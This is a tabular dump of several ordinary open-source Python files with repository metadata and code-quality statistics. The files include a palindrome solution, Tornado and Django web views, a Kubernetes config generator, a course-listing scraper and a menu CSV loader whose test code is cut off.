hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a31c4a4e0fe5dc12cc9ca8b45190499c5c2d8d7c | 764 | py | Python | Dataset/Leetcode/train/5/414.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/5/414.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/5/414.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def XXX(self, s: str) -> str:
# 1025 third coding two pointers
n = len(s)
if n<=1: return s
def isValid(left,right,maxlen,res):#中心扩展法的复杂度更低,减少一层循环!
while left>=0 and right<n and s[left]==s[right]:
#如果把s[left]==s[right]放在下边判断,需要讨论left和right取值!
if right-left+1>maxlen:
maxlen = right-left+1
res = s[left:right+1]#提前记录结果,不许再修改left和right取值
left-=1
right+=1
return maxlen, res
maxlen = 0
res = ''
for i in range(n-1):#依次访问各个点,指针的起点!
maxlen,res = isValid(i,i,maxlen,res)
maxlen,res = isValid(i,i+1,maxlen,res)
return res
| 31.833333 | 66 | 0.5 | 97 | 764 | 3.938144 | 0.391753 | 0.141361 | 0.052356 | 0.089005 | 0.094241 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029787 | 0.384817 | 764 | 23 | 67 | 33.217391 | 0.782979 | 0.171466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3250ae256c079f8ab4462143988bb1f83ef4d63 | 1,352 | py | Python | api/user.py | yishuangxi/car-tornado | bff2a77569ca9b2eee9298b64078d6b533ac280f | [
"MIT"
] | null | null | null | api/user.py | yishuangxi/car-tornado | bff2a77569ca9b2eee9298b64078d6b533ac280f | [
"MIT"
] | null | null | null | api/user.py | yishuangxi/car-tornado | bff2a77569ca9b2eee9298b64078d6b533ac280f | [
"MIT"
] | null | null | null | # coding=utf8
from base import ApiBase
from tornado.gen import coroutine, Return
from service.user import ServiceUser
class ApiUserBase(ApiBase):
def __init__(self, *args, **kwargs):
super(ApiUserBase, self).__init__(*args, **kwargs)
self.srv_user = ServiceUser()
class ApiUserLogin(ApiUserBase):
@coroutine
def post(self, *args, **kwargs):
username = self.get_argument('username')
password = self.get_argument('password')
user = self.srv_user.find_one_by_username_password(username, password)
if user:
pass
else:
pass
class ApiUserDetail(ApiUserBase):
@coroutine
def get(self, user_id):
user = yield self.srv_user.find_one_by_id(user_id)
self.json_success(data=user)
class ApiUserRegister(ApiUserBase):
@coroutine
def post(self, *args, **kwargs):
username = self.get_argument('username')
password = self.get_argument('password')
phone = self.get_argument('phone')
sex = self.get_argument('sex')
valid, msg = yield self.srv_user.check_register(username, password, phone, sex)
if not valid:
self.json_error(msg=msg)
else:
user_id = yield self.srv_user.create(username, password, phone, sex)
self.json_success(data=user_id)
| 26.509804 | 87 | 0.650888 | 162 | 1,352 | 5.222222 | 0.308642 | 0.049645 | 0.106383 | 0.056738 | 0.345154 | 0.29078 | 0.243499 | 0.243499 | 0.243499 | 0.243499 | 0 | 0.000978 | 0.244083 | 1,352 | 50 | 88 | 27.04 | 0.82681 | 0.008136 | 0 | 0.371429 | 0 | 0 | 0.02994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0.2 | 0.085714 | 0 | 0.314286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a32551bf11b157b158593f1dc1d29f74c491413f | 3,632 | py | Python | rbe_benchmarks/tools/generate_yml.py | jiyangchen/benchmarks | cfc870bd2871072accf8cef14b03edcb963bf62b | [
"Apache-2.0"
] | null | null | null | rbe_benchmarks/tools/generate_yml.py | jiyangchen/benchmarks | cfc870bd2871072accf8cef14b03edcb963bf62b | [
"Apache-2.0"
] | null | null | null | rbe_benchmarks/tools/generate_yml.py | jiyangchen/benchmarks | cfc870bd2871072accf8cef14b03edcb963bf62b | [
"Apache-2.0"
] | null | null | null | """Generates Kubernetes config yml file from benchmark_configs.yml file.
This script should only be run from opensource repository.
"""
import argparse
import logging
import os
from string import maketrans
import k8s_tensorflow_lib
import yaml
_TEST_NAME_ENV_VAR = 'TF_DIST_BENCHMARK_NAME'
_PORT = 5000
def _ConvertToValidName(name):
"""Converts to name that we can use as a kubernetes job prefix.
Args:
name: benchmark name.
Returns:
Benchmark name that can be used as a kubernetes job prefix.
"""
return name.translate(maketrans('/:_', '---'))
def _GetGpuVolumeMounts(flags):
"""Get volume specs to add to Kubernetes config.
Args:
flags: flags
Returns:
Volume specs in the format: volume_name: (hostPath, podPath).
"""
volume_specs = {}
if flags.nvidia_lib_dir:
volume_specs['nvidia-libraries'] = (flags.nvidia_lib_dir, '/usr/lib/nvidia')
if flags.cuda_lib_dir:
cuda_library_files = ['libcuda.so', 'libcuda.so.1', 'libcudart.so']
for cuda_library_file in cuda_library_files:
lib_name = cuda_library_file.split('.')[0]
volume_specs['cuda-libraries-%s' % lib_name] = (
os.path.join(flags.cuda_lib_dir, cuda_library_file),
os.path.join('/usr/lib/cuda/', cuda_library_file))
return volume_specs
def main():
parser = argparse.ArgumentParser()
parser.register(
'type', 'bool', lambda v: v.lower() in ('true', 't', 'y', 'yes'))
parser.add_argument(
'--benchmark_configs_file', type=str, default=None, required=True,
help='YAML file with benchmark configs.')
parser.add_argument(
'--benchmark_config_output', type=str, default=None, required=True,
help='YAML file to store final config.')
parser.add_argument(
'--docker_image', type=str, default=None, required=True,
help='Docker iage to use on K8S to run test.')
parser.add_argument(
'--cuda_lib_dir', type=str, default=None, required=False,
help='Directory where cuda library files are located on gcloud node.')
parser.add_argument(
'--nvidia_lib_dir', type=str, default=None, required=False,
help='Directory where nvidia library files are located on gcloud node.')
flags, _ = parser.parse_known_args()
logging.basicConfig(level=logging.DEBUG)
config_base_path = os.path.dirname(__file__)
config_text = open(
os.path.join(config_base_path, flags.benchmark_configs_file), 'r').read()
configs = yaml.load(config_text)
# TODO(annarev): run benchmarks in parallel instead of sequentially.
for config in configs:
name = _ConvertToValidName(str(config['benchmark_name']))
env_vars = {
_TEST_NAME_ENV_VAR: name
}
gpu_count = (0 if 'gpus_per_machine' not in config
else config['gpus_per_machine'])
volumes = {}
if gpu_count > 0:
volumes = _GetGpuVolumeMounts(flags)
env_vars['LD_LIBRARY_PATH'] = (
'/usr/lib/cuda:/usr/lib/nvidia:/usr/lib/x86_64-linux-gnu')
env_vars.update(config.get('env_vars', {}))
args = config.get('args', {})
kubernetes_config = k8s_tensorflow_lib.GenerateConfig(
config['worker_count'],
config['ps_count'],
_PORT,
request_load_balancer=False,
docker_image=flags.docker_image,
name_prefix=name,
additional_args=args,
env_vars=env_vars,
volumes=volumes,
use_shared_volume=False,
use_cluster_spec=False,
gpu_limit=gpu_count)
with open(flags.benchmark_config_output, 'w') as output_config_file:
output_config_file.write(kubernetes_config)
if __name__ == '__main__':
main()
| 30.266667 | 80 | 0.688877 | 484 | 3,632 | 4.911157 | 0.330579 | 0.032394 | 0.035759 | 0.037863 | 0.164914 | 0.146403 | 0.124527 | 0.081615 | 0.081615 | 0.046277 | 0 | 0.005128 | 0.194659 | 3,632 | 119 | 81 | 30.521008 | 0.807521 | 0.138491 | 0 | 0.064103 | 1 | 0.012821 | 0.201295 | 0.040777 | 0 | 0 | 0 | 0.008403 | 0 | 1 | 0.038462 | false | 0 | 0.076923 | 0 | 0.141026 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a327e559ec1007ff0c6e601f9102a6d72e363ee4 | 676 | py | Python | models/wrf_hydro/hydro_dart_py/setup.py | hkershaw-brown/feature-preprocess | fe2bd77b38c63fa0566c83ebc4d2fac1623aef66 | [
"Apache-2.0"
] | 2 | 2021-07-05T03:43:35.000Z | 2021-07-05T11:39:49.000Z | models/wrf_hydro/hydro_dart_py/setup.py | hkershaw-brown/feature-preprocess | fe2bd77b38c63fa0566c83ebc4d2fac1623aef66 | [
"Apache-2.0"
] | 1 | 2021-03-31T04:16:45.000Z | 2021-03-31T04:16:45.000Z | models/wrf_hydro/hydro_dart_py/setup.py | hkershaw-brown/feature-preprocess | fe2bd77b38c63fa0566c83ebc4d2fac1623aef66 | [
"Apache-2.0"
] | 1 | 2020-11-20T23:36:16.000Z | 2020-11-20T23:36:16.000Z | from setuptools import find_packages, setup
setup(
name='hydrodartpy',
version='0.0.1',
packages=find_packages(),
package_data={'hydrodartpy': ['core/data/*']},
url='https://github.com/NCAR/wrf_hydro_dart',
license='MIT',
install_requires=[
'boltons',
'datetime',
'deepdiff',
'f90nml',
'netCDF4',
'pandas',
'pathlib',
'pytest',
'pytest-html',
'pytest-datadir-ng',
'pywrfhydro',
'wrfhydropy',
'xarray',
'ruamel.yaml'
],
author='James McCreight',
author_email='jamesmcc@ucar.edu',
description='API for wrf_hydro_dart',
)
| 22.533333 | 50 | 0.554734 | 65 | 676 | 5.630769 | 0.8 | 0.065574 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012422 | 0.285503 | 676 | 29 | 51 | 23.310345 | 0.745342 | 0 | 0 | 0 | 0 | 0 | 0.37426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a32e4db7bc30f0df393066446313d79fe0f329a5 | 3,296 | py | Python | core/views.py | dishad/ADD | 51455c493a4eb433eb1d8dde44771e917efcb500 | [
"MIT"
] | null | null | null | core/views.py | dishad/ADD | 51455c493a4eb433eb1d8dde44771e917efcb500 | [
"MIT"
] | 4 | 2016-11-26T19:10:01.000Z | 2016-12-24T10:42:16.000Z | core/views.py | dishad/deanslist | 51455c493a4eb433eb1d8dde44771e917efcb500 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import Context, loader
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth import authenticate
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from core.models import Category, Post
from core.forms import CreateAccForm, ForgotPasswordForm, PostForm
@login_required
def index(request):
newpostform = PostForm()
return render(request, 'core/index.html',
{
'categories': get_categories(),
'form': newpostform
})
def login(request):
# request is post, log in
if request.method == 'POST':
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(username=username, password=password)
if user is not None:
login_user(request, user)
return HttpResponseRedirect('/')
else:
return HttpResponse('Error: could not log in')
else:
# request is get, display page
t = loader.get_template('core/login.html')
c = Context()
return HttpResponse(t.render(c))
def logout(request):
logout_user(request)
return redirect('%s?next=%s', (settings.LOGIN_URL, request.path))
# create account view
def createacc(request):
form = CreateAccForm()
if request.method == "POST":
form = CreateAccForm(request.POST)
if form.is_valid():
print("about to create new user")
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
username = form.cleaned_data.get('username')
email = form.cleaned_data.get('email')
password = form.cleaned_data.get('password')
new_user = User.objects.create_user(first_name=first_name, last_name=last_name, username=username, email=email, password=password)
new_user = authenticate(username=username, password=password)
if new_user:
login_user(request, new_user)
print("new user created: " + new_user.get_username() + " " + new_user.get_full_name())
return HttpResponseRedirect('/');
else:
print('failed to authenticate user')
else:
print("invalid form")
return render(request, 'core/createacc.html', {'form': form})
else:
return render(request, 'core/createacc.html', {'form': form})
# forgot password
def forgotpassword(request):
#if request.method == 'POST'
#TODO: forgot password functionality
#else
return render(request, 'core/forgotpassword.html', {'form': form})
def newpost(request):
form = PostForm(request.POST)
if form.is_valid():
cur_user = request.user
title = form.cleaned_data.get('title')
price = form.cleaned_data.get('price')
description = form.cleaned_data.get('description')
poster = cur_user.id
category = form.cleaned_data.get('category')
subcategory = form.cleaned_data.get('subcategory')
Post.objects.create(title=title, price=price, description=description, poster=poster, category=category)
HttpResponseRedirect('/newpostsuccess')
else:
print('form not valid')
HttpResponseRedirect('/')
def newpostsuccess(request):
return render(request, 'core/newpostsuccess.html')
def get_categories():
return Category.objects.all()
| 24.969697 | 133 | 0.739078 | 421 | 3,296 | 5.679335 | 0.228029 | 0.046006 | 0.062735 | 0.075282 | 0.176077 | 0.098703 | 0.078628 | 0.036805 | 0 | 0 | 0 | 0 | 0.140777 | 3,296 | 131 | 134 | 25.160305 | 0.84428 | 0.047027 | 0 | 0.123457 | 0 | 0 | 0.125479 | 0.015326 | 0 | 0 | 0 | 0.007634 | 0 | 1 | 0.098765 | false | 0.111111 | 0.135802 | 0.037037 | 0.37037 | 0.061728 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a32f8483b338b36563493c6ba6c4c80894f08bdb | 3,706 | py | Python | pachong.py | echo6120/pythonhomework | e4b89f2aa3632f39dafcf95860dc1616727b7647 | [
"MIT"
] | 2 | 2018-03-24T10:55:31.000Z | 2018-03-24T10:56:13.000Z | pachong.py | echo6120/pythonhomework | e4b89f2aa3632f39dafcf95860dc1616727b7647 | [
"MIT"
] | null | null | null | pachong.py | echo6120/pythonhomework | e4b89f2aa3632f39dafcf95860dc1616727b7647 | [
"MIT"
] | 1 | 2019-10-10T12:58:51.000Z | 2019-10-10T12:58:51.000Z | #coding=utf-8
#抓取精品课网站中的课程,把有优惠券的课程筛选出来
#第一步:访问ke.youdao.com 获取精品课网页的所有的标签内容,例如:四六级,考研,实用英语...:
#第二步:访问标签页,获取课程详情页的url
#第三步:获取课程详情页需要的信息
#第四步:保存到Excel表中
import requests
import urllib3
import re
import sys
from bs4 import BeautifulSoup
from openpyxl import Workbook
from openpyxl import load_workbook
#抓取标签,"http://ke.youdao.com"
def get_labels(url,label_file):
urllib3.disable_warnings()
resq = requests.get(url,verify=False).text
labels = re.findall(r"href=\"(/tag/\d+)",resq)
valid_labellink=[]
for label in labels:
valid_labellink.append(url+label)
with open(label_file,"w") as fp:
for i in set(valid_labellink):
fp.writelines(i+"\n")
print "labes url get done"
#通过标签抓取课程详情页url
def get_kelink(labellink_file,kelink_file):
valid_kelink=[]
with open(labellink_file) as fp:
for line in fp:
requests.packages.urllib3.disable_warnings()
resq1=requests.get(line.strip(),verify=False).text
ke_urls = re.findall(r"href=\"(https://ke\.youdao\.com/course/detail/\d+)",resq1)
for kelink in ke_urls:
valid_kelink.append(kelink.strip())
with open(kelink_file,"w")as fp1:
for kelink in set(valid_kelink):
fp1.writelines(kelink+"\n")
print "ke url get done"
#爬取课程名称,价格,开课时间,主讲老师
def get_courseinfo(kelink_file):
result=[]
with open(kelink_file) as fp:
for keurl in fp:
urllib3.disable_warnings()
resq2 = requests.get(keurl.strip(),verify=False).text
soup = BeautifulSoup(resq2,'html.parser')
try:
#names = soup.select("div.info.info-without-video > h1")
names = soup.select("div.g-w.body > div > h1")
teachernames = soup.select("div.g-w.body > div > p")
coursetimes = soup.select("div.g-w.body > div > p")
if names!=None and teachernames!=None and coursetimes!=None:
data = {
'name': str(names[0]).strip().strip('<h1>').strip('</h1>'),
'teachername:': str(teachernames[0]).strip().strip("<p>").strip("</p>"),
'coursetimes': str(coursetimes[1]).strip().strip("<p>").strip("</p>"),
'url': keurl.strip()
}
result.append(data)
#print data
else:
print u"有属性为空了,skip skip"
except Exception, e:
print e
return result
#将爬虫下来的内容保存在Excel
def write_excel(filename,result):
wb = load_workbook(filename)
wb.guess_types = True
ws=wb.active
#excel表中有多少行,Excel的行和列是从第一行列开始的
for i in range(1,len(result)+1):
#取result列表中的每个data,每个data为一行
result_item = result[i-1]
#默认从第一列开始
column_num=1
#遍历字典data,每个属性增加一列
for key,value1 in result_item.items():
if value1.strip() != None:
ws.cell(row=i,column=column_num,value=value1)
column_num+=1
wb.save(filename)
def main():
'''
#抓去ke.youdao.com上面的标签
url="https://ke.youdao.com"
label_filename="d:\\label.txt"
get_labels(url,label_filename)
#抓取课程详情页的url
kelink_file="d:\\kelink.txt"
get_kelink(label_filename,kelink_file)
'''
kelink_file = "d:\\kelink.txt"
#抓取课程详细信息
get_courseinfo(kelink_file)
result = get_courseinfo(kelink_file)[1:10]
write_excel("d:\\test.xlsx",result)
if __name__=="__main__":
reload(sys)
sys.setdefaultencoding("utf-8")
main()
| 31.948276 | 100 | 0.578251 | 445 | 3,706 | 4.698876 | 0.361798 | 0.043042 | 0.024868 | 0.032999 | 0.095648 | 0.03252 | 0.03252 | 0.021999 | 0 | 0 | 0 | 0.011792 | 0.29061 | 3,706 | 115 | 101 | 32.226087 | 0.783568 | 0.100378 | 0 | 0.026316 | 0 | 0 | 0.077223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.092105 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3333b4a0600b9d0895d786748402493b643bfc1 | 1,895 | py | Python | tests/test_accis_ex/test_accis.py | dsanchez-garcia/accim | 0f64df81a9ecd8424317f9213d90d802e8282c9f | [
"MIT"
] | null | null | null | tests/test_accis_ex/test_accis.py | dsanchez-garcia/accim | 0f64df81a9ecd8424317f9213d90d802e8282c9f | [
"MIT"
] | null | null | null | tests/test_accis_ex/test_accis.py | dsanchez-garcia/accim | 0f64df81a9ecd8424317f9213d90d802e8282c9f | [
"MIT"
] | null | null | null | from accim.sim import accis
def test_addAccis():
from accim.sim import accis
from os import listdir
scriptTypeList = ['ex_mm', 'ex_ac']
outputsList = ['simplified', 'standard', 'timestep']
EPlist = ['ep95']
for i in scriptTypeList:
for j in outputsList:
for k in EPlist:
accis.addAccis(
ScriptType=i,
Outputs=j,
EnergyPlus_version=k,
AdapStand=[1],
CAT=[1],
ComfMod=[1],
HVACmode=[2],
VentCtrl=[0],
VSToffset=[0],
MinOToffset=[50],
MaxWindSpeed=[50],
ASTtol_start=0.1,
ASTtol_end_input=0.1,
ASTtol_steps=0.1,
NameSuffix=i+'_'+j,
verboseMode=False,
confirmGen=True
)
expectedNames = [
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_0[VC_X[VO_X[MT_X[MW_X[AT_0.1[ex_ac_simplified.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_0[VC_X[VO_X[MT_X[MW_X[AT_0.1[ex_ac_standard.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_0[VC_X[VO_X[MT_X[MW_X[AT_0.1[ex_ac_timestep.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_2[VC_0[VO_0[MT_50[MW_50[AT_0.1[ex_mm_simplified.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_2[VC_0[VO_0[MT_50[MW_50[AT_0.1[ex_mm_standard.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_2[VC_0[VO_0[MT_50[MW_50[AT_0.1[ex_mm_timestep.idf',
]
actualNames = [i for i in listdir() if i.endswith('.idf') and '_pymod' in i]
for i in range(len(actualNames)):
assert actualNames[i] == expectedNames[i]
| 42.111111 | 120 | 0.584169 | 273 | 1,895 | 3.710623 | 0.274725 | 0.017769 | 0.148075 | 0.17769 | 0.504442 | 0.459033 | 0.459033 | 0.459033 | 0.459033 | 0.459033 | 0 | 0.073004 | 0.306069 | 1,895 | 44 | 121 | 43.068182 | 0.697338 | 0 | 0 | 0.05 | 0 | 0.15 | 0.364644 | 0.337731 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.025 | false | 0 | 0.075 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a333816616f27fa0708f60bb8239202a5cc3a6e2 | 3,553 | py | Python | menu.py | chatea/948 | bde99bbaef78650b3ebafef3f24f87f72f4a0a8d | [
"MIT"
] | null | null | null | menu.py | chatea/948 | bde99bbaef78650b3ebafef3f24f87f72f4a0a8d | [
"MIT"
] | null | null | null | menu.py | chatea/948 | bde99bbaef78650b3ebafef3f24f87f72f4a0a8d | [
"MIT"
] | 2 | 2016-08-19T06:05:59.000Z | 2016-08-20T00:26:52.000Z | # -*- coding: utf-8 -*-
import json
import csv
import logging
_TEST_MENU_ID = u'-1'
_KEY_MENU_ID = u'menu_id'
_KEY_MENU_NAME = u'name'
_KEY_MENU_TITLE = u'title'
_KEY_MENU_IMAGE_URL = u'image_url'
_KEY_MENU_PATH = u'path_to_file'
KEY_ITEM_ID = u'id'
KEY_ITEM_NAME = u'name'
KEY_ITEM_ITEMS = u'items'
KEY_ITEM_IMAGE_URL = u"image_url"
KEY_ITEM_PRICE = u'prices'
KEY_ITEM_CATEGORY = u'category'
def load_csv(filename):
""" load a CSV file, output is a dictionary
Args:
filename: the full file path for read
Return:
A dictionary
"""
with file(filename, 'rb') as csvfile:
ret = {}
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
headers = reader.next()
headers = [unicode(w, 'utf-8') for w in headers]
for row in reader:
item_id = unicode(row[0], 'utf-8')
items = {}
for i in xrange(0, len(row)):
if headers[i] == KEY_ITEM_ITEMS:
key = headers[i]
dumped_items = json.loads(row[i])
items[key] = [str(i).decode('utf-8') for i in dumped_items]
else:
items[headers[i]] = unicode(row[i], 'utf-8')
ret[item_id] = items
return ret
print "import menu list"
menu_map = load_csv('menulist.csv')
print "import menu list complete:"
def get_menu_list():
global menu_map
return menu_map
def get_menu(menu_id):
""" get menu by menu id
Return:
return menu if exist, else None
"""
global menu_map
global _KEY_MENU_PATH
menu_id = str(menu_id).encode('utf-8')
if menu_id not in menu_map:
return None
menu_item = menu_map[menu_id]
file_path = menu_item[_KEY_MENU_PATH]
return load_csv(file_path)
def test():
menu_list = get_menu_list()
assert menu_list is not None, "Cannot find menu list!"
test_menu = get_menu(_TEST_MENU_ID)
assert test_menu is not None, "Cannot find test menu"
assert test_menu[u'0'][KEY_ITEM_ID] == u'0', "id is not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_ITEMS] == [u'0'], "items are not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_NAME] == u'海帶', "name is not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_PRICE] == u'30', "price is not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_CATEGORY] == u'海鮮', "cateogry is not correct for item id 0"
assert test_menu[u'1'][KEY_ITEM_ID] == u'1', "id is not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_ITEMS] == [u'1'], "items are not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_NAME] == u'王子麵', "name is not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_PRICE] == u'20', "price is not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_CATEGORY] == u'', "cateogry is not correct for item id 1"
assert test_menu[u'2'][KEY_ITEM_ID] == u'2', "id is not correct for item id 2"
assert test_menu[u'2'][KEY_ITEM_ITEMS] == [u'0',u'1'], "items are not correct for item id 2"
